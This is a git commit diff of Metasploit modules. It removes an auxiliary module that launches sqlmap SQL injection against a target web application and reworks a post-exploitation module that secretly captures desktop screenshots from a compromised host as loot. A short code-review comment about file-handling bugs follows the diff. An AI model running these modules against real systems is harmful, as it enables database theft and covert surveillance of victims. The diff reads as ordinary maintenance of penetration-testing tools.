parent
f12171d1a0
commit
460a1f551c
|
@ -1,112 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WmapScanUniqueQuery
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sqlmap SQL Injection External Module',
|
||||
'Description' => %q{
|
||||
This module launches a sqlmap session.
|
||||
Sqlmap is an automatic SQL injection tool developed in Python.
|
||||
Its goal is to detect and take advantage of SQL injection
|
||||
vulnerabilities on web applications. Once it detects one
|
||||
or more SQL injections on the target host, the user can
|
||||
choose among a variety of options to perform an extensive
|
||||
back-end database management system fingerprint, retrieve
|
||||
DBMS session user and database, enumerate users, password
|
||||
hashes, privileges, databases, dump entire or user
|
||||
specific DBMS tables/columns, run his own SQL SELECT
|
||||
statement, read specific files on the file system and much
|
||||
more.
|
||||
},
|
||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://sqlmap.sourceforge.net'],
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.6.1 full path ", '/sqlmap' ]),
|
||||
OptEnum.new('METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST']]),
|
||||
OptString.new('PATH', [ true, "The path/file to test for SQL injection", 'index.php' ]),
|
||||
OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
|
||||
OptString.new('DATA', [ false, "The data string to be sent through POST" ]),
|
||||
OptString.new('OPTS', [ false, "The sqlmap options to use" ]),
|
||||
OptBool.new('BATCH', [ true, "Never ask for user input, use the default behaviour", true ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Modify to true if you have sqlmap installed.
|
||||
def wmap_enabled
|
||||
false
|
||||
end
|
||||
|
||||
# Test a single host
|
||||
def run_host(ip)
|
||||
|
||||
sqlmap = File.join(datastore['SQLMAP_PATH'], 'sqlmap.py')
|
||||
unless File.file?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' could not be found")
|
||||
return
|
||||
end
|
||||
unless File.readable?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' is not readable")
|
||||
return
|
||||
end
|
||||
unless File.executable?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' is not executable")
|
||||
return
|
||||
end
|
||||
|
||||
data = ""
|
||||
data << datastore['DATA'].to_s
|
||||
opts = datastore['OPTS']
|
||||
method = datastore['METHOD'].upcase
|
||||
|
||||
wmap_target_host = datastore['VHOST'] if datastore['VHOST']
|
||||
|
||||
sqlmap_url = (datastore['SSL'] ? "https" : "http")
|
||||
sqlmap_url << "://"
|
||||
sqlmap_url << wmap_target_host
|
||||
sqlmap_url << ":"
|
||||
sqlmap_url << wmap_target_port.to_s
|
||||
sqlmap_url << "/"
|
||||
sqlmap_url << datastore['PATH']
|
||||
|
||||
if method == "GET"
|
||||
sqlmap_url << '?'
|
||||
sqlmap_url << datastore['QUERY']
|
||||
elsif method == "POST"
|
||||
data << "&"
|
||||
data << datastore['QUERY']
|
||||
end
|
||||
|
||||
cmd = [ sqlmap ]
|
||||
cmd += [ '-u', sqlmap_url ]
|
||||
if opts
|
||||
cmd << opts
|
||||
end
|
||||
if data
|
||||
cmd += [ '--data', data ]
|
||||
end
|
||||
if datastore['BATCH'] == true
|
||||
cmd << '--batch'
|
||||
end
|
||||
|
||||
print_status("exec: #{cmd.inspect}")
|
||||
system(*cmd)
|
||||
end
|
||||
|
||||
end
|
|
@ -14,11 +14,11 @@ class Metasploit3 < Msf::Post
|
|||
This module will incrementally take desktop screenshots from the host. This
|
||||
allows for screen spying which can be useful to determine if there is an active
|
||||
user on a machine, or to record the screen for later data extraction.
|
||||
NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name
|
||||
will be appended directly on to the end of the value of VIEW_CMD (use 'auto' to
|
||||
have the module do it's best...default browser for Windows, firefox for *nix, and
|
||||
preview app for macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress
|
||||
opening of screenshots all together, set the VIEW_CMD option to 'none'.
|
||||
|
||||
Note: As of March, 2014, the VIEW_CMD option has been removed in
|
||||
favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but
|
||||
not how) the collected screenshots will be viewed from the Metasploit
|
||||
interface.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -36,11 +36,19 @@ class Metasploit3 < Msf::Post
|
|||
[
|
||||
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]),
|
||||
OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]),
|
||||
OptString.new('VIEW_CMD', [false, 'Command to use for viewing screenshots (auto, none also accepted)', 'auto']),
|
||||
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them',false])
|
||||
OptBool.new('VIEW_SCREENSHOTS', [false, 'View screenshots automatically', false]),
|
||||
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def view_screenshots?
|
||||
datastore['VIEW_SCREENSHOTS']
|
||||
end
|
||||
|
||||
def record?
|
||||
datastore['RECORD']
|
||||
end
|
||||
|
||||
def run
|
||||
host = session.session_host
|
||||
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"
|
||||
|
@ -58,25 +66,6 @@ class Metasploit3 < Msf::Post
|
|||
return
|
||||
end
|
||||
|
||||
# here we check for the local platform to determine what to do when 'auto' is selected
|
||||
if datastore['VIEW_CMD'].downcase == 'auto'
|
||||
case ::RbConfig::CONFIG['host_os']
|
||||
when /mac|darwin/
|
||||
cmd = "open file://#{screenshot}" # this will use preview usually
|
||||
when /mswin|win|mingw/
|
||||
cmd = "start iexplore.exe \"file://#{screenshot}\""
|
||||
when /linux|cygwin/
|
||||
# This opens a new tab for each screenshot, but I don't see a better way
|
||||
cmd = "firefox file://#{screenshot} &"
|
||||
else # bsd/sun/solaris might be different, but for now...
|
||||
cmd = "firefox file://#{screenshot} &"
|
||||
end
|
||||
elsif datastore['VIEW_CMD'].downcase == 'none'
|
||||
cmd = nil
|
||||
else
|
||||
cmd = "#{datastore['VIEW_CMD']}#{screenshot}"
|
||||
end
|
||||
|
||||
begin
|
||||
count = datastore['COUNT']
|
||||
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
||||
|
@ -92,20 +81,29 @@ class Metasploit3 < Msf::Post
|
|||
return false
|
||||
end
|
||||
if data
|
||||
if datastore['RECORD']
|
||||
|
||||
if record?
|
||||
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
|
||||
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
|
||||
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
|
||||
end
|
||||
|
||||
# also write to disk temporarily so we can display in browser. They may or may not have been RECORDed.
|
||||
if cmd # do this if they have not suppressed VIEW_CMD display
|
||||
# also write to disk temporarily so we can display in browser.
|
||||
# They may or may not have been RECORDed.
|
||||
# do this if they have not suppressed VIEW_SCREENSHOT display
|
||||
if view_screenshots?
|
||||
fd = ::File.new(screenshot, 'wb')
|
||||
fd.write(data)
|
||||
fd.close
|
||||
end
|
||||
|
||||
end
|
||||
system(cmd) if cmd
|
||||
|
||||
if view_screenshots?
|
||||
screenshot_path = "file://#{screenshot}"
|
||||
Rex::Compat.open_browser(screenshot_path)
|
||||
end
|
||||
|
||||
end
|
||||
rescue IOError, Errno::ENOENT => e
|
||||
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||
|
@ -115,9 +113,11 @@ class Metasploit3 < Msf::Post
|
|||
if file_locations and not file_locations.empty?
|
||||
print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
|
||||
end
|
||||
if cmd
|
||||
|
||||
if view_screenshots?
|
||||
# wait 2 secs so the last file can get opened before deletion
|
||||
select(nil, nil, nil, 2)
|
||||
sleep 2
|
||||
vprint_status "Deleting temporary screenshot file: #{screenshot}"
|
||||
begin
|
||||
::File.delete(screenshot)
|
||||
rescue Exception => e
|
||||
|
@ -125,6 +125,7 @@ class Metasploit3 < Msf::Post
|
|||
print_error("This may be due to the file being in use if you are on a Windows platform")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def migrate_explorer
|
||||
|
|
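Review bot: In the `@ -92,20 +81,29 @@` hunk, the new `if view_screenshots?` block writes the temporary file as `fd = ::File.new(screenshot, 'wb')` / `fd.write(data)` / `fd.close`, so if `write` raises one of the errors the `rescue IOError, Errno::ENOENT` clause below catches, `fd.close` is skipped and the descriptor leaks; the block form `::File.open(screenshot, 'wb') { |fd| fd.write(data) }` (or `::File.binwrite(screenshot, data)`) closes it on every path. The second new `if view_screenshots?` block, the one calling `Rex::Compat.open_browser`, appears to sit after the `end` that closes `if data`, so a pass with `data` nil still points the browser at whatever is at `screenshot` from an earlier capture, or at a missing file on the first pass; `if data && view_screenshots?` keeps the viewer in step with the write. The new `view_screenshots?` and `record?` predicates in the `@ -36,11 +36,19 @@` hunk would benefit from a one-line comment each, e.g. `# Whether captured screenshots are opened in the local browser (VIEW_SCREENSHOTS option).`. `run` starts and ends outside these hunks.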